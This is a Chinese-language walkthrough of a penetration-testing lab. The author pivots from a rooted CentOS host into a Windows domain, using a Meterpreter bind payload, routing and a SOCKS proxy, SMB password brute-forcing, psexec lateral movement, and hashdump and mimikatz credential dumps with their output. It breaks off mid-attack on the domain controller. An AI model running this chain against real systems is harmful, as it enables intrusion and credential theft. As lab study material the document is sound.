    192.168.93.55 (incomplete) eth1
    192.168.93.139 (incomplete) eth1
    192.168.93.124 (incomplete) eth1
    192.168.93.84 (incomplete) eth1
    192.168.93.67 (incomplete) eth1
    192.168.93.25 (incomplete) eth1
    192.168.93.169 (incomplete) eth1
    192.168.111.132 (incomplete) eth0
    192.168.93.228 (incomplete) eth1
    192.168.93.170 (incomplete) eth1
    192.168.93.240 (incomplete) eth1
    192.168.93.105 (incomplete) eth1
    192.168.93.37 (incomplete) eth1
    192.168.93.224 (incomplete) eth1
    192.168.93.86 (incomplete) eth1
    192.168.93.71 (incomplete) eth1
    192.168.93.199 (incomplete) eth1
    192.168.93.106 (incomplete) eth1
    192.168.93.56 (incomplete) eth1
    192.168.93.198 (incomplete) eth1
    192.168.93.131 (incomplete) eth1
    192.168.93.69 (incomplete) eth1
    192.168.93.80 (incomplete) eth1
    192.168.93.32 (incomplete) eth1
    192.168.93.177 (incomplete) eth1
    192.168.93.16 (incomplete) eth1
    192.168.93.197 (incomplete) eth1
    192.168.93.149 (incomplete) eth1
    192.168.93.108 (incomplete) eth1
    192.168.93.189 (incomplete) eth1
    192.168.93.144 (incomplete) eth1
    192.168.93.111 (incomplete) eth1
    192.168.93.151 (incomplete) eth1
    192.168.93.138 (incomplete) eth1
    192.168.93.66 (incomplete) eth1
    192.168.93.238 (incomplete) eth1
    192.168.93.137 (incomplete) eth1
    192.168.93.76 (incomplete) eth1
    192.168.93.245 (incomplete) eth1
    192.168.93.219 (incomplete) eth1
    192.168.93.94 (incomplete) eth1
    192.168.93.17 (incomplete) eth1
    192.168.93.63 (incomplete) eth1
    192.168.93.147 (incomplete) eth1
    192.168.93.140 (incomplete) eth1
    192.168.93.243 (incomplete) eth1
    192.168.93.47 (incomplete) eth1
    192.168.93.65 (incomplete) eth1
    192.168.93.182 (incomplete) eth1
    192.168.93.23 (incomplete) eth1
    192.168.93.222 (incomplete) eth1
    192.168.93.167 (incomplete) eth1
    192.168.93.116 (incomplete) eth1
    192.168.93.156 (incomplete) eth1
    192.168.93.28 (incomplete) eth1
    192.168.93.83 (incomplete) eth1
    192.168.93.134 (incomplete) eth1
    192.168.93.146 (incomplete) eth1
    192.168.93.190 (incomplete) eth1
    192.168.93.163 (incomplete) eth1
    192.168.93.122 (incomplete) eth1
    192.168.93.252 (incomplete) eth1
    192.168.93.148 (incomplete) eth1
    192.168.93.30 ether 00:50:56:b1:b3:0d C eth1
    192.168.93.227 (incomplete) eth1
    192.168.93.233 (incomplete) eth1
    192.168.93.136 (incomplete) eth1
    192.168.93.12 (incomplete) eth1
    192.168.93.43 (incomplete) eth1
    192.168.93.164 (incomplete) eth1
    192.168.93.14 (incomplete) eth1
    192.168.93.242 (incomplete) eth1
    192.168.93.200 (incomplete) eth1
    192.168.93.168 (incomplete) eth1
    192.168.93.181 (incomplete) eth1
    192.168.93.213 (incomplete) eth1
    192.168.93.160 (incomplete) eth1
    192.168.93.102 (incomplete) eth1
    192.168.93.5 (incomplete) eth1
    192.168.93.206 (incomplete) eth1
    192.168.93.231 (incomplete) eth1
    192.168.93.3 (incomplete) eth1
    192.168.93.34 (incomplete) eth1
    192.168.93.127 (incomplete) eth1
    192.168.93.226 (incomplete) eth1
    192.168.93.115 (incomplete) eth1
    192.168.93.158 (incomplete) eth1
    192.168.93.161 (incomplete) eth1
    192.168.93.46 (incomplete) eth1
    192.168.93.20 ether 00:50:56:b1:ab:06 C eth1
    192.168.93.59 (incomplete) eth1
    192.168.93.236 (incomplete) eth1
    192.168.93.155 (incomplete) eth1
    192.168.93.207 (incomplete) eth1
    192.168.93.173 (incomplete) eth1
    192.168.93.126 (incomplete) eth1
    192.168.93.153 (incomplete) eth1
    192.168.93.2 (incomplete) eth1
    192.168.93.114 (incomplete) eth1
    192.168.93.192 (incomplete) eth1
    192.168.93.51 (incomplete) eth1
    192.168.93.123 (incomplete) eth1
    192.168.93.225 (incomplete) eth1
    192.168.93.135 (incomplete) eth1
    192.168.93.48 (incomplete) eth1
    192.168.93.179 (incomplete) eth1
    192.168.93.21 (incomplete) eth1
    192.168.93.78 (incomplete) eth1
    192.168.93.249 (incomplete) eth1
    192.168.93.193 (incomplete) eth1
    192.168.93.246 (incomplete) eth1
    [toor@localhost tmp]#

    这个时候,我们要上线MSF就需要说,kali和这个ROOT机器要能够通信
    之前其实也可以需要通信了,然后直接用kali里面自带的这个脏牛来打
    然后把OPENVPN文件放入kali中,然后CD到桌面,用命令
    1
    openvpn 9025.ovpn
    但是我发现有问题,我在kali里面连接这个机器的时候,一开OPENVPN的话就会卡死我的服务,就是那台脏牛提权之后的机器就是连接不上了,那个页面就卡死了
    断开重连吧
    1
    2
    3
    4
    ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20
    wwwuser_123Aqx
    su toor
    123456
    win上和kali上都可以用这个连接上我们的ROOT机器
    主要是他们之间的通信问题,之前豆包告诉我的通信失败问题我有点不太信了
    但是蚁剑webshell那台和ROOT那台确实可以通信
    然后和我的WIN还有KALI的再试试
    测试通信
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # 测跳板机 → Windows 主机
    ping -c 2 192.168.220.1

    # 测跳板机 → Kali 虚拟机
    ping -c 2 192.168.220.128

    # 测跳板机 → VPN 客户端隧道地址
    ping -c 2 10.8.0.6

    然后还有就是WEBSHELL那台通信的
    ping -c 2 192.168.93.120
    [toor@localhost wwwuser]# ping -c 2 192.168.93.120
    PING 192.168.93.120 (192.168.93.120) 56(84) bytes of data.
    64 bytes from 192.168.93.120: icmp_seq=1 ttl=64 time=0.315 ms
    64 bytes from 192.168.93.120: icmp_seq=2 ttl=64 time=0.283 ms

    --- 192.168.93.120 ping statistics ---
    2 packets transmitted, 2 received, 0% packet loss, time 999ms
    rtt min/avg/max/mdev = 0.283/0.299/0.315/0.016 ms
    [toor@localhost wwwuser]#
    就第四个是成功的
    但是就是我们的KALI是可以找到这个SSH连接上的ROOT机器的
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    ping 192.168.111.20 -c 3
    ┌──(root㉿kali)-[~]
    └─# ping 192.168.111.20 -c 3
    PING 192.168.111.20 (192.168.111.20) 56(84) bytes of data.
    64 bytes from 192.168.111.20: icmp_seq=1 ttl=63 time=45.0 ms
    64 bytes from 192.168.111.20: icmp_seq=2 ttl=63 time=48.3 ms
    64 bytes from 192.168.111.20: icmp_seq=3 ttl=63 time=46.6 ms
    --- 192.168.111.20 ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2004ms
    rtt min/avg/max/mdev = 45.043/46.633/48.284/1.323 ms

    ┌──(root㉿kali)-[~]
    └─# nc -znv.168.111.20 4444
    (UNKNOWN) [192.168.111.20] 4444 (?) open
    可以看到KALI是可以向SSH后ROOT的那台通信的

经过了不懈努力和GPT的帮助,还是上线MSF了

1
2
3
4
5
6
7
8
9
10
11
meterpreter > 
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 6.5 (Linux 2.6.32-431.el6.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: toor
meterpreter >

后面就是后渗透的内容了

中间省了两步
第一步:建立KALI机器和SSH连接的ROOT机器之间的文件传输连接
第二步:MSF上线

MSF上线

生成目标本地监听的正向绑定载荷,监听端口可自定义(示例用 5555)

1
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=5555 -f elf -o /tmp/meter_bind.elf

生成后的文件位于/tmp/meter_bind.elf
然后ROOT机器下载文件
下载好了后

1
2
3
chmod +x /tmp/meter_bind.elf
setsid /tmp/meter_bind.elf >/dev/null 2>&1 &
ss -tlnp | grep 5555

看到 0.0.0.0:5555 处于 LISTEN 状态,再回来操作 MSF
然后回到kali

1
2
3
4
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.111.20
set LPORT 5555
run

建立文件传输服务

这里就是卡我卡的最久的一个地方
主要是这个我们的是用别人的靶机,所以kali和靶机之间不能直接通信
好像别人全是自己搭建靶机的话,就可以实现这个直接建立连接了,其他啥都不用管

在 Kali 登录 ROOT:

1
ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20

输入 wwwuser 密码。登录后切换管理员:

1
su toor

输入 toor 密码。

传文件时,另开一个 Kali 本机终端。

Kali → ROOT:

1
scp -O -o HostKeyAlgorithms=+ssh-rsa /本地文件路径 wwwuser@192.168.111.20:/tmp/

把 Kali 的文件上传到 ROOT 的 /tmp。

ROOT → Kali:

1
scp -O -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20:/远程文件路径 /本地保存目录/

把 ROOT 上 wwwuser 有权限读取的文件下载到 Kali。

基本说明:

  • 中文路径替换成实际路径,含空格时加引号。
  • scp 提示密码时,输入 wwwuser 密码。
  • -O:大写字母 O,使用传统 SCP 协议。
  • -o HostKeyAlgorithms=+ssh-rsa:兼容目标的旧 SSH 主机密钥算法。
  • 文件通过 SSH 的 22 端口传输。

首先我们就是SSH拿到ROOT的过程,如果前面一切都清楚了的话是非常快的
然后KALI执行

1
2
3
4
5
6
7
8
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=5555 -f elf -o /tmp/meter_bind.elf
回显
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
Final size of elf file: 198 bytes
Saved as: /tmp/meter_bind.elf

然后把生成的文件传给ROOT机器

1
2
scp -O -o HostKeyAlgorithms=+ssh-rsa /tmp/meter_bind.elf wwwuser@192.168.111.20:/tmp/

ROOT机器执行

1
2
3
4
[toor@localhost wwwuser]# ls -l /tmp/meter_bind.elf
-rw-r--r--. 1 wwwuser wwwuser 198 Oct 4 09:50 /tmp/meter_bind.elf
[toor@localhost wwwuser]#

可以看到已经传过来了
然后ROOT机器给权限

1
2
chmod +x /tmp/meter_bind.elf

后台启动载荷,脱离终端运行

1
2
3
4
setsid /tmp/meter_bind.elf >/dev/null 2>&1 &
验证端口是否成功监听:
ss -tlnp | grep 5555

然后MSF那边去连接
kali执行

1
2
3
4
5
6
7
8
msfconsole -q
调起MSF
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.111.20
set LPORT 5555

run

最后结果

1
2
3
4
5
6
7
8
9
10
LPORT => 5555
msf exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.111.20:5555
[*] Sending stage (3090404 bytes) to 192.168.111.20
[*] Meterpreter session 1 opened (192.168.220.128:37177 -> 192.168.111.20:5555) at 2026-10-06 23:04:33 +0800

meterpreter >
meterpreter >

可以看到一下就成功了
验证一下

1
2
3
4
meterpreter > getuid
Server username: toor
meterpreter >

一下问题都没有

内网信息搜集及以后部分

route查看一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > route

IPv4 network routes
===================

Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
192.168.93.0 255.255.255.0 0.0.0.0 0 eth1
192.168.111.0 255.255.255.0 0.0.0.0 0 eth0

No IPv6 routes were found.
meterpreter >

确实是一个外网IP一个内网IP,接下来对内网IP所在网段进行探测

可以看到192.168.93.0/24:内部局域网,只有这台靶机能访问,你的 Kali 直接无法到达这个网段的任何机器
所以我们要把所有发给192.168.93.0/24 的流量都走这台跳板机

1
2
3
4
5
6
7
8
9
10
run autoroute -s 192.168.93.0/24
回显:
meterpreter > run autoroute -s 192.168.93.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.111.20
[*] Use the -p option to list all active routes
meterpreter >

添加路由成功
再执行

1
2
3
4
5
6
bg
回显:
meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/handler) >

,执行后会回到 msf6 exploit(multi/handler) > 的主控制台提示符,就说明会话已经后台运行了
然后启动SOCK5代理模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
use auxiliary/server/socks_proxy
set srvport 6677
run
回显
[*] Backgrounding session 1...
msf exploit(multi/handler) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set srvport 6677
srvport => 6677
msf auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server
msf auxiliary(server/socks_proxy) >

这里可以看到代理成功
然后开始扫描主机

1
2
3
4
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 5
run

这个扫描会不会有点问题呀,就是可能会使得你这个连接断掉
又要重新上MSF
我扫完断了两次了
但是结果应该是一样的
不扫了

1
2
3
4
IP 地址	主机名	角色 / 开放服务	所属域
192.168.93.10 WIN-8GA56TNV3MV 域控 DC(DNS、NetBIOS) TEST
192.168.93.20 WIN2008 数据库服务器(MSSQL 1433/1434、NetBIOS) TEST
192.168.93.30 WIN7 域内工作站(NetBIOS) TEST

接下来扫描端口

1
2
3
use auxiliary/scanner/portscan/tcp
set RHOSTS [主机IP]
run

注意到都开启了445端口,所以尝试一下SMB爆破

大佬思路。但是我怕跟着扫就是会出现又挂了的情况,所以可能一些思路会有出入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
先试试较老的win2008:

use auxiliary/scanner/smb/smb_login

set RHOSTS 192.168.93.30

set pass_file /home/kali/桌面/pass.txt

set SMBUser administrator

run


爆破出密码为123qwe!ASD

psexec横向移动getshell 域成员主机
有了密码直接psexec连接:

use exploit/windows/smb/psexec

set payload windows/x64/meterpreter/bind_tcp

set SMBUser administrator

set SMBPass 123qwe!ASD

set RHOSTS 192.168.93.20

run

直接获得了system权限的shell

看看系统信息:

先
shell
再
systeminfo
回显


发现域为test.org

同理,用psexec尝试连接win 7。成功

已经控制了两台域成员主机了,现在试试同样的方法拿域控:



失败了

和红日2一样的思路,mimikatz启动

由于感觉上传mimikatz比较麻烦所以使用msf中的mimikatz,首先进入win2008的sessions,再开始使用:

加载kiwi模块

load kiwi

抓取一下密码:

kiwi_cmd sekurlsa::logonPasswords

抓取到密码为:zxcASDqw123!!

再次尝试psexec横向移动:


失败,试试wmiexec,我的imapcket套件在windows上所以要再配一下代理

先用proxifier配置一下:

然后直接启动wmiexec:

./wmiexec_windows.exe administrator:zxcASDqw123!!@192.168.93.10
image-20240805165416488

直接getshell了,接下来找找靶场描述的重要文件:

成功拿到flag

然后回到我的打法
执行 SMB 密码爆破
执行之前,我们先得搞一下字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[~]
└─# wget -Op/pass.txt https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt

--2026-10-07 00:11:13-- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 198.18.0.110
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|198.18.0.110|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73026 (71K) [text/plain]
Saving to: '/tmp/pass.txt'

/tmp/pass.txt 100%[==========================>] 71.31K 204KB/s in 0.3s

2026-10-07 00:11:15 (204 KB/s) - '/tmp/pass.txt' saved [73026/73026]


┌──(root㉿kali)-[~]
└─#

然后执行

1
2
3
4
5
6
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.93.30
set SMBUser administrator
set pass_file /tmp/pass.txt
run

这里扫的非常慢呀

1
2
3
4
5
6
7
8
9
10
msf auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >

然后执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
use exploit/windows/smb/psexec
set RHOSTS 192.168.93.30
set SMBUser administrator
set SMBPass 123qwe!ASD
set payload windows/x64/meterpreter/bind_tcp
run
回显
ession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf exploit(windows/smb/psexec) > set RHOSTS 192.168.93.30
RHOSTS => 192.168.93.30
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > run

[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (232006 bytes) to 192.168.93.30
[*] Meterpreter session 2 opened (Local Pipe -> Remote Pipe via session 1) at 2026-10-07 00:27:56 +0800

meterpreter >
meterpreter >

然后验证身份

1
2
3
4
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

可以看到这里已经是另外一台机器了

1
2
3
4
5
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31c1794c5aa8547c87a8bcd0324b8337:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

执行后会输出本地所有用户的 NTLM 哈希,其中就包含 administrator 的哈希值,后续可以直接用哈希传递(Pass-the-Hash)横向攻击内网其他机器,不用再爆破密码

bg一下回到MSF主控制台
然后执行
已经拿到 WIN7 本地管理员的 NTLM 哈希。接下来我们用这套凭据横向移动,直接拿下 192.168.93.20 WIN2008 数据库服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
use exploit/windows/smb/psexec
set RHOSTS 192.168.93.20
set SMBUser administrator
set SMBPass 123qwe!ASD
set payload windows/x64/meterpreter/bind_tcp
run
回显
meterpreter > bg
[*] Backgrounding session 2...
msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/bind_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf exploit(windows/smb/psexec) > set RHOSTS 192.168.93.20
RHOSTS => 192.168.93.20
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > run
[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (232006 bytes) to 192.168.93.20
[*] Meterpreter session 3 opened (Local Pipe -> Remote Pipe via session 1) at 2026-10-07 00:31:30 +0800

meterpreter >

然后可以看到

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN2008
OS : Windows Server 2008 (6.0 Build 6003, Service Pack 2).
Architecture : x64
System Language : en_US
Domain : TEST
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >

我们已经拿下2008这台机器了
拿下的前提是:很多企业内网(包括靶场环境)为了运维方便,会给所有 Windows 主机的本地 administrator 账号设置统一的相同密码。
你在 Win7 工作站(192.168.93.30)上爆破得到的 administrator:123qwe!ASD,在 Win2008 数据库服务器(192.168.93.20)上同样有效
最后我们准备拿下最后一台DC域控

1
2
3
4
5
6
7
use exploit/windows/smb/psexec
set RHOSTS 192.168.93.10
set SMBUser TEST\administrator
set SMBPass 123qwe!ASD
set payload windows/x64/meterpreter/bind_tcp
run

这里用 TEST\administrator 显式指定域账号,避免本地账号解析问题;依旧用 bind_tcp 绑定型 payload,通过跳板机的内网路由主动连接域控

执行成功拿到 Meterpreter 后,我们就可以导出 NTDS.dit 域内所有用户的密码哈希,直接完成整个 TEST 域的权限控制
但是这里发现密码就不一样了

我们就需要换方法来打域控了
回到2008那个方法

1
2
sessions -i 3

加载 Mimikatz 模块(kiwi)

1
2
load kiwi

这里解释两个原因,为什么要用 kiwi,为什么要在 WIN2008 那台用 KIWI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
kiwi 是 Metasploit 内置的 **Mimikatz 扩展模块**,核心目的是从目标系统内存中窃取缓存的账号凭据,选它的原因非常明确:

1. **无需上传文件,隐蔽干净**
直接在 Meterpreter 会话里加载扩展,全程内存操作,不用往目标机器上传 `mimikatz.exe` 实体文件,既避免触发杀毒软件,也不会留下文件操作痕迹,操作效率和隐蔽性都更高。
2. **刚好解决当前的核心问题**
我们现在卡在「本地管理员密码打不通域控」,说明域控的管理员账号是独立的域账号,密码和本地管理员不通用。而 kiwi 可以读取系统 LSASS 进程内存,输出所有缓存过的**本地账号、域账号的明文密码和 NTLM 哈希**,只要域管理员登录过这台机器,就能把他的密码抓出来,用来打域控。
3. **权限刚好匹配**
读取 LSASS 进程内存必须要 System 权限,我们已经拿到了这台机器的最高 System 权限,条件完全满足。

---

### 二、为什么选 WIN2008 这台机器用 kiwi?

这是内网渗透抓取域管凭据的标准优先级选择,核心有 3 个原因:

1. **角色属性:域管理员登录概率高得多**
WIN2008 是数据库服务器,属于内网核心业务服务器。域管理员日常运维(备份数据库、配置服务、故障排查)大概率会登录这台机器;而 WIN7 只是普通终端工作站,域管理员主动登录的概率很低。
只有被域管登录过的机器,内存里才会留下域管的登录凭据,所以优先从核心服务器抓取,效率最高。
2. **系统特性:默认缓存明文密码**
Windows Server 2008(带 SP2)默认开启 **WDigest 认证**,用户登录后,LSASS 内存里会缓存**明文密码**,用 `creds_all` 或 `wdigest` 命令可以直接读出来;而 Win7 部分补丁版本默认禁用 WDigest,很多时候只能抓到 NTLM 哈希,不一定能拿到明文。
3. **权限已经就绪**
我们已经拿到了这台 WIN2008 的 System 权限,满足 kiwi 读取内存的权限要求,直接加载就能用,不用再做额外提权操作。

如果 WIN2008 里没抓到域管凭据,再退回到 WIN7 工作站上用同样方法尝试;两台都抓不到的话,再考虑 Kerberoasting、域内枚举等其他路径。优先抓核心服务器,是内网渗透拿域管的最高效路径

结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter >
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator WIN2008 ae946ec6f4ca785b9337 31c1794c5aa8547c87a8 128c0272959b85b33009
1dee1d5ee7e6 bcd0324b8337 0611169d07d85cb6bd0b
WIN2008$ TEST a2c62a457416624c0fdb be05606cc73a691b49b4
86659d5c7108 9e61c0f933996ed7649e

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN2008 123qwe!ASD
WIN2008$ TEST 39 03 a8 b7 ce 3e 93 b2 76 c8 09 99 16 f5 87 49 97 3e 4d 94 83 a
d b7 b4 94 e7 33 f5 f4 8d aa c7 dc 87 9b f0 87 6d 5f e9 a9 08 c9
22 5e db 12 7a 00 9b 44 08 59 f8 e6 32 cc 0b 78 3a 50 9e 4d 3d
3a 3e b8 33 a0 69 54 b8 28 ee 22 87 56 52 63 e0 d8 3c 4b e3 72 a
4 c5 6f 98 f4 b6 d7 53 39 4b 66 54 7a fe 32 97 d2 29 91 2a 2c 78
8c 58 f7 70 b3 dc ce 03 da 4e 8b d7 2b ae 24 25 22 0e ca 36 c3
cd 9d 7e bd 99 ab b3 2d f5 aa 0d f9 c5 0c 34 e9 86 f8 3e fe 1c e
4 e1 c8 2d 68 ce 84 83 10 47 ce 55 72 bc fe fa 8e 24 c9 11 25 9b
e7 5c cd 09 f7 52 3f 75 ea ed aa 0c 8e d6 d2 87 db fc 20 3a 08
7e de 0b 76 5e c6 6e 3c 89 06 61 20 fa 32 72 c3 a5 3a 2d 9c f9 7
9 53 83 3e aa 11 b5 3f 40 32 a9 aa 72 ef e5 13 ab bd 0e a6 41 74
67 d2 37 32 9d

tspkg credentials
=================

Username Domain Password
-------- ------ --------
Administrator WIN2008 123qwe!ASD

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN2008 123qwe!ASD
win2008$ TEST.ORG 39 03 a8 b7 ce 3e 93 b2 76 c8 09 99 16 f5 87 49 97 3e 4d 94 83
ad b7 b4 94 e7 33 f5 f4 8d aa c7 dc 87 9b f0 87 6d 5f e9 a9 08
c9 22 5e db 12 7a 00 9b 44 08 59 f8 e6 32 cc 0b 78 3a 50 9e 4d
3d 3a 3e b8 33 a0 69 54 b8 28 ee 22 87 56 52 63 e0 d8 3c 4b e3
72 a4 c5 6f 98 f4 b6 d7 53 39 4b 66 54 7a fe 32 97 d2 29 91 2a
2c 78 8c 58 f7 70 b3 dc ce 03 da 4e 8b d7 2b ae 24 25 22 0e ca
36 c3 cd 9d 7e bd 99 ab b3 2d f5 aa 0d f9 c5 0c 34 e9 86 f8 3e
fe 1c e4 e1 c8 2d 68 ce 84 83 10 47 ce 55 72 bc fe fa 8e 24 c9
11 25 9b e7 5c cd 09 f7 52 3f 75 ea ed aa 0c 8e d6 d2 87 db fc
20 3a 08 7e de 0b 76 5e c6 6e 3c 89 06 61 20 fa 32 72 c3 a5 3a
2d 9c f9 79 53 83 3e aa 11 b5 3f 40 32 a9 aa 72 ef e5 13 ab bd
0e a6 41 74 67 d2 37 32 9d


meterpreter >

这里可以直接看到我们的这个结果,发现并没有我们要的

我们再回到2007那台(把前面的-i 3的3改为2)
BG步骤也要的
然后执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
load kiwi
creds_all
回显:
meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
WIN7$ TEST bb6b48766fb280d74babb50e781bbc21 4ebd2d435d946f95f31d5c16351791fea97e
8f43

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN7$ TEST Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0SI
OYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
win7$ test.org Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0
SIOYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB
win7$ TEST.ORG Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0
SIOYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB


meterpreter >
meterpreter >

还是没有我们要的管理员的

我们又要换思路了
我试过打永恒之蓝呀,不行
那就可能又得回到其他大佬博客的方法了

打wmiexec
先看proxifier

然后回到MSF

1
2
3
4
5
6
7
8
先back然后变成msf >

use auxiliary/server/socks_proxy
